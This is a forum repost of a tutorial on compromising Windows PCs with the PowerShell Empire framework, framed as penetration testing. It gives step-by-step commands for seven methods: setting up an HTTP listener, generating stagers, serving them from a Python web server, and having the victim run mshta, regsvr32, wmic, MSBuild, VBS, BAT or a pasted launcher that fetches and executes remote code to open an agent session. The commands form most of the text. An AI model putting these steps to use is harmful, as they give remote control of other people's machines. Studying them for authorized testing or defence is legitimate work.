Jump to content
Nytro

Multiple Ways to Exploiting Windows PC using PowerShell Empire

Recommended Posts

Multiple Ways to Exploiting Windows PC using PowerShell Empire

This is our second post in the article series ‘PowerShell Empire’. In this article we will cover all the exploits that leads to windows exploitation with empire. To our first post on empire series, which gives a basic guide to navigate your way through empire, click here.

Table of content:

  • Exploiting through HTA
  • Exploiting through MSBuild.exe
  • Exploiting through regsvr32
  • XSL exploit
  • Exploiting through visual basic script
  • BAT exploit
  • Multi_launcher exploit

Exploiting through HTA

This attack helps us to exploit windows through .hta. when .hta file is run via mshta.exe it executes as .exe file with similar functionality which lets us hack our way through. To know more about this attack please click here.

To run type ‘./Empire’.

According to the work flow, firstly, we have to create a listener to listen on our local machine. Type the following command:

listeners
1
listeners

After running the above command, it will say that “no listeners are currently active” but don’t worry, we are into the listener interface now.  So in this listener interface, type :

uselistener http set Host http://192.168.1.107 execute
1
2
3
uselistener http
set Host http://192.168.1.107
execute

Now that a listener is created, type ‘back’ to go in listener interface to create an exploit. For this, type :

usestager windows/hta set Listener http set OutFile /root/1.hta execute
1
2
3
4
usestager windows/hta
set Listener http
set OutFile /root/1.hta
execute

1.png?w=687&ssl=1

Running the above commands will create an .hta file to be used as malware. Start the python server using the following command, in order to share our .hta file:

python -m SimpleHTTPServer 8080
1
python -m SimpleHTTPServer 8080

2.png?w=687&ssl=1

As the python server is up and running, type the following command in victims’ command prompt to execute our malicious file:

mshta.exe http:/192.168.1.107:8080/1.hta
1
mshta.exe http:/192.168.1.107:8080/1.hta

3.png?w=687&ssl=1

The moment above command is executed you will have your session, to access the session type :

interact XDGM6HLE sysinfo
1
2
interact XDGM6HLE
sysinfo

4.png?w=687&ssl=1

Exploiting through MSBuild.exe

Our next exploit is via MSBuild.exe, which will let you have a remote session of windows using XML file. To know in details about this attack please click here. And to use this exploit type:

listeners uselistener http set Host http:/192.168.1.107 execute
1
2
3
4
listeners
uselistener http
set Host http:/192.168.1.107
execute

This creates a listener, type ‘back’ to go in listener interface to create a exploit. For this, type :

usestager windows/launcher_xml set Listener http execute
1
2
3
usestager windows/launcher_xml
set Listener http
execute

5.1.png?w=687&ssl=1

Now, an .xml file is created in /tmp. Copy this file in victims’ PC (inside Microsoft.NET\Framework\v4.0.30319\) and run it typing combination of following commands:

cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\ MSBuild.exe launcher.xml
1
2
cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe launcher.xml

5.png?w=687&ssl=1

So, this way you will have your session, to access the said session type :

interact A8H14C7L sysinfo
1
2
interact A8H14C7L
sysinfo

6.png?w=687&ssl=1

Exploiting through regsvr32

Our next method is exploiting through regsvr32. To know in detail about this attack, do click here. As always, we have to create a listener first to listen on our local machine. Type the following command:

listeners uselistener http set Host http://192.168.1.107 execute
1
2
3
4
listeners
uselistener http
set Host http://192.168.1.107
execute

Now that a listener is created, type ‘back’ to go in listener interface to create an exploit. For this, type:

usestager windows/launcher_sct set Listener http execute
1
2
3
usestager windows/launcher_sct
set Listener http
execute

 7.png?w=687&ssl=1

This will create a .sct file in /tmp. Share this file to victim’s PC using python server and then run this file in run window of victims’ PC by typing the following command:

regsvr /u /n /s /i:http://192.168.1.107:8080/launcher.sct scrobj.dll
1
regsvr /u /n /s /i:http://192.168.1.107:8080/launcher.sct scrobj.dll

8.png?w=687&ssl=1

Thus, you will have an active session. To access the session type:

interact <session name> sysinfo
1
2
interact <session name>
sysinfo

9.png?w=687&ssl=1

Exploiting through XSL

XSL is a language will helps you format data, this also describes how web server will interact with using XML. Our next method of attack with empire is by exploiting .xsl file.  For this method lets activate our listener first by typing :

listeners uselistener http set Host http://192.168.1.107 execute
1
2
3
4
listeners
uselistener http
set Host http://192.168.1.107
execute

As the listener is up and running, create your exploit :

usestager windows/launcher_xsl set Listener http execute
1
2
3
usestager windows/launcher_xsl
set Listener http
execute

10.png?w=687&ssl=1

This way .xsl file is created. Now run the python server from the folder where the .xsl file is created as shown in the image below :

cd /tmp python -m SimpleHTTPServer 8080
1
2
cd /tmp
python -m SimpleHTTPServer 8080

11.png?w=687&ssl=1

Now execute the following command in the command prompt of your victim:

wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"
1
wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"

12.png?w=687&ssl=1

Running above will give a session, to access the session type :

interact <session name> sysinfo
1
2
interact <session name>
sysinfo

13.png?w=687&ssl=1

Exploiting through Visual Basic script

Our next method is to create a malicious VBS file and exploiting our victim through it. Like always, let’s create a listener first.

listeners uselistener http set Host http://192.168.1.107 execute
1
2
3
4
listeners
uselistener http
set Host http://192.168.1.107
execute

Now, to create our malicious .vbs file type :

usestager windows/launcher_vbs set Listener http execute
1
2
3
usestager windows/launcher_vbs
set Listener http
execute

14.png?w=687&ssl=1

Next step is to start the python server by typing:

python -m SimpleHTTPServer 8080
1
python -m SimpleHTTPServer 8080

15.png?w=687&ssl=1

Once the .vbs file is shared through python server and executed in the victim’s PC you will have you r session and just like before to access the session type :

interact <session name> sysinfo
1
2
interact <session name>
sysinfo

16.png?w=687&ssl=1

Exploiting through .bat

In this method, we will exploit through .bat file. Like our previous exploits, this time too, let’s create a listener. For this, type:

listeners uselistener http set Host http://192.168.1.107 execute back
1
2
3
4
5
listeners
uselistener http
set Host http://192.168.1.107
execute
back

The above commands will create a listener for you. Let’s create our .bat file using following command :

usestager windows/launcher_bat use Listener http set OutFile /root/1.bat execute
1
2
3
4
usestager windows/launcher_bat
use Listener http
set OutFile /root/1.bat
execute

17.png?w=687&ssl=1

As shown, the above commands will create a .bat file. Start up the python server by using following command to allow you share you .bat file on your victim’s pc.

python -m SimpleHTTPServer 8080
1
python -m SimpleHTTPServer 8080

18.png?w=687&ssl=1

Once you run the .bat file, a session will activate. To access the session type:

interact <session name> sysinfo
1
2
interact <session name>
sysinfo

19.png?w=687&ssl=1

Multi_launcher

This is our last method of this post. It can be used on various platforms such as windows, linux, etc. again, even for this method, create a listener:

listerners uselistener http set Host http://192.168.1.107 execute
1
2
3
4
listerners
uselistener http
set Host http://192.168.1.107
execute

Then type following commands for create your malicious file:

usestager multi/launcher set listerner http execute
1
2
3
usestager multi/launcher
set listerner http
execute

20.png?w=687&ssl=1

Once you hit enter after the above commands, it will give you a code. Copy this code and paste it in the command prompt of victim and hit enter. As soon as you hit enter, you will have activated a session. To access the session, type:

interact <session name> sysinfo
1
2
interact <session name>
sysinfo

21.png?w=687&ssl=1

Conclusion

The above were the methods that you can use to exploit windows using different vulnerabilities. Using this framework is an addition to your pentesting skills after Metasploit. Enjoy!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

ABOUT THE AUTHOR

Raj Chandel

Raj Chandel

Raj Chandel is a Skilled and Passionate IT Professional especially in IT-Hacking Industry. At present other than his name he can also be called as An Ethical Hacker, A Cyber Security Expert, A Penetration Tester. With years of quality Experience in IT and software industry

 

Sursa: https://www.hackingarticles.in/multiple-ways-to-exploiting-windows-pc-using-powershell-empire/

  • Upvote 3
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...